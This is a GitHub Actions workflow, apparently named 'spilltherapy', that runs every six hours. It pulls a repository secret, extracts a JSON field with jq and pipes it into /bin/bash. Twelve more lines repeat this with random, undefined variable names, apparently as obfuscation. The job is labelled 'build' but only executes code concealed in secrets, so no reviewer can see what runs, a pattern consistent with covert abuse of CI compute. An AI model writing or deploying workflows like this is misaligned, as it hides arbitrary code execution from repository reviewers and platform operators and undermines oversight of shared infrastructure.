name: spilltherapy
on:
  workflow_dispatch:
  schedule:
    - cron: '28 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: spilltherapy
        env:
          ji3: ${{ secrets.ji3 }}
        run: |
          echo $ji3 | jq -r .o2 | /bin/bash
          echo $yjmbp9403 | jq -r .lvhm1578 | /bin/bash
          echo $ul3 | jq -r .rhwmn8 | /bin/bash
          echo $xnj504 | jq -r .vdg315 | /bin/bash
          echo $d1388 | jq -r .dtq42649 | /bin/bash
          echo $rahr39000 | jq -r .dqnpr099 | /bin/bash
          echo $owng5975 | jq -r .gcbw31440 | /bin/bash
          echo $qfste0836 | jq -r .ys050 | /bin/bash
          echo $emlqk4652 | jq -r .glylv88 | /bin/bash
          echo $qsdj062 | jq -r .vkk42775 | /bin/bash
          echo $zxkn52 | jq -r .bw7810 | /bin/bash
          echo $cp32 | jq -r .nejty220 | /bin/bash
          echo $daceu0921 | jq -r .kq5258 | /bin/bash

